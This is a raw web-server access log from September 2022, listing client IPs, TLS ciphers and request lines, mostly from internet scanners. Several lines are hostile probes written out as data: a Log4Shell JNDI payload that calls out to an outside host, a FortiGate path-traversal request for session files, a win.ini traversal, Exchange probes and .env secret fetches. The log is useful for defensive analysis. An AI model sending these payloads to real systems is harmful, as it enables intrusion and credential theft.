[08/Sep/2022:03:42:22 +0200] 45.95.147.53 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /Electron/download/windows/\\Windows\\win.ini HTTP/1.0" 423
[08/Sep/2022:03:55:48 +0200] 192.241.195.59 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[08/Sep/2022:03:56:00 +0200] 192.241.194.219 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[08/Sep/2022:03:56:27 +0200] 192.241.203.213 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[08/Sep/2022:03:59:48 +0200] 80.87.206.247 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:03:59:49 +0200] 80.87.206.247 TLSv1.2 AES256-SHA "GET /Public/home/js/check.js HTTP/1.1" 316
[08/Sep/2022:03:59:49 +0200] 80.87.206.247 TLSv1.2 AES256-SHA "GET /static/admin/javascript/hetong.js HTTP/1.1" 325
[08/Sep/2022:04:20:27 +0200] 152.89.196.62 TLSv1.2 AES256-SHA "-" -
[08/Sep/2022:04:55:17 +0200] 138.246.253.24 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 403
[08/Sep/2022:05:13:38 +0200] 192.241.196.178 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 335
[08/Sep/2022:05:58:15 +0200] 192.241.197.78 TLSv1.2 AES256-SHA "GET /actuator/health HTTP/1.1" 310
[08/Sep/2022:06:05:56 +0200] 152.89.196.62 TLSv1.2 AES256-SHA "GET /actuator/gateway/routes HTTP/1.1" 315
[08/Sep/2022:06:43:40 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[08/Sep/2022:06:43:52 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[08/Sep/2022:06:43:56 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[08/Sep/2022:06:43:57 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[08/Sep/2022:06:44:00 +0200] 94.102.49.190 TLSv1.2 AES256-SHA "quit" 379
[08/Sep/2022:06:44:00 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /robots.txt HTTP/1.1" 393
[08/Sep/2022:06:44:00 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /sitemap.xml HTTP/1.1" 394
[08/Sep/2022:06:44:01 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.well-known/security.txt HTTP/1.1" 407
[08/Sep/2022:06:44:01 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /favicon.ico HTTP/1.1" 309
[08/Sep/2022:06:44:02 +0200] 94.102.49.190 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "" 379
[08/Sep/2022:07:34:32 +0200] 159.203.63.170 TLSv1.2 AES256-SHA "GET /ab2g HTTP/1.1" 304
[08/Sep/2022:07:34:33 +0200] 159.203.63.170 TLSv1.2 AES256-SHA "GET /ab2h HTTP/1.1" 304
[08/Sep/2022:07:34:38 +0200] 159.203.63.170 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:07:52:27 +0200] 162.221.192.26 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:08:30:14 +0200] 83.136.32.58 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "HEAD / HTTP/1.0" -
[08/Sep/2022:08:33:35 +0200] 64.62.197.152 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[08/Sep/2022:08:39:56 +0200] 64.62.197.152 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[08/Sep/2022:08:40:44 +0200] 198.199.93.101 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:08:43:34 +0200] 64.62.197.155 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:09:06:08 +0200] 152.89.196.23 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 452
[08/Sep/2022:09:11:32 +0200] 185.189.182.234 TLSv1.2 AES256-SHA "GET /AQgc HTTP/1.1" 379
[08/Sep/2022:09:14:08 +0200] 43.158.217.180 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:09:17:17 +0200] 162.221.192.26 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:09:51:54 +0200] 20.12.11.47 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[08/Sep/2022:09:51:55 +0200] 20.12.11.47 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301
[08/Sep/2022:12:18:48 +0200] 172.104.234.155 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:12:32:59 +0200] 34.83.58.129 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "OPTIONS / HTTP/1.0" 383
[08/Sep/2022:12:38:32 +0200] 172.104.234.155 TLSv1.2 AES256-SHA "GET /?x=${jndi:ldap://${hostName}.uri.cccs5r926una0nv4t8mgpndbkbf5wst53.oast.live/a} HTTP/1.1" 370
[08/Sep/2022:12:38:32 +0200] 172.104.234.155 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 383
[08/Sep/2022:14:27:41 +0200] 138.68.134.194 TLSv1.2 AES256-SHA "GET /ab2g HTTP/1.1" 304
[08/Sep/2022:14:27:41 +0200] 138.68.134.194 TLSv1.2 AES256-SHA "GET /ab2h HTTP/1.1" 304
[08/Sep/2022:14:27:42 +0200] 138.68.134.194 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:14:50:16 +0200] 192.241.197.13 TLSv1.2 AES256-SHA "GET /owa/auth/logon.aspx HTTP/1.1" 314
[08/Sep/2022:14:53:06 +0200] 198.199.93.157 TLSv1.2 AES256-SHA "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 348
[08/Sep/2022:14:55:51 +0200] 192.241.202.219 TLSv1.2 AES256-SHA "GET /owa/auth/x.js HTTP/1.1" 310
[08/Sep/2022:15:08:34 +0200] 193.235.141.169 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 306
[08/Sep/2022:16:34:45 +0200] 138.246.253.24 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 387
[08/Sep/2022:18:31:49 +0200] 20.12.11.47 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /.env HTTP/1.1" 304
[08/Sep/2022:18:31:50 +0200] 20.12.11.47 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "POST / HTTP/1.1" 301
[08/Sep/2022:20:34:02 +0200] 128.14.134.134 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:20:48:33 +0200] 206.189.0.121 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[08/Sep/2022:21:19:23 +0200] 193.235.141.172 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 295
[08/Sep/2022:22:46:43 +0200] 178.62.220.189 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /logon/fonts/citrix-fonts.css HTTP/1.1" 411
[08/Sep/2022:22:49:10 +0200] 154.89.5.217 TLSv1.2 AES256-SHA "GET / HTTP/1.0" 383
[08/Sep/2022:23:12:36 +0200] 34.217.20.193 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[08/Sep/2022:23:13:09 +0200] 35.88.66.168 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[08/Sep/2022:23:13:09 +0200] 35.87.193.19 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314
[08/Sep/2022:23:13:16 +0200] 35.87.193.19 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[08/Sep/2022:23:13:22 +0200] 54.188.35.92 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[08/Sep/2022:23:14:26 +0200] 35.91.19.54 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314
[09/Sep/2022:00:12:07 +0200] 128.14.141.34 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[09/Sep/2022:00:46:20 +0200] 35.233.62.116 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 301
[09/Sep/2022:01:10:10 +0200] 223.71.167.165 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET / HTTP/1.1" 383
[09/Sep/2022:01:10:11 +0200] 138.246.253.24 TLSv1.2 AES256-SHA "GET /robots.txt HTTP/1.1" 404
[09/Sep/2022:01:25:47 +0200] 152.89.196.23 TLSv1.2 DHE-RSA-AES256-GCM-SHA384 "GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1" 452
[09/Sep/2022:01:49:20 +0200] 43.131.66.209 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 500
[09/Sep/2022:01:49:30 +0200] 205.185.116.89 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 301
[09/Sep/2022:01:49:33 +0200] 209.141.35.128 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 309
[09/Sep/2022:01:49:39 +0200] 209.141.35.128 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 297
[09/Sep/2022:01:49:42 +0200] 209.141.36.112 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 305
[09/Sep/2022:01:49:46 +0200] 209.141.41.193 TLSv1.2 AES256-SHA "GET / HTTP/1.1" 307
[09/Sep/2022:01:49:48 +0200] 205.185.122.184 TLSv1.2 AES256-SHA "GET /favicon.ico HTTP/1.1" 314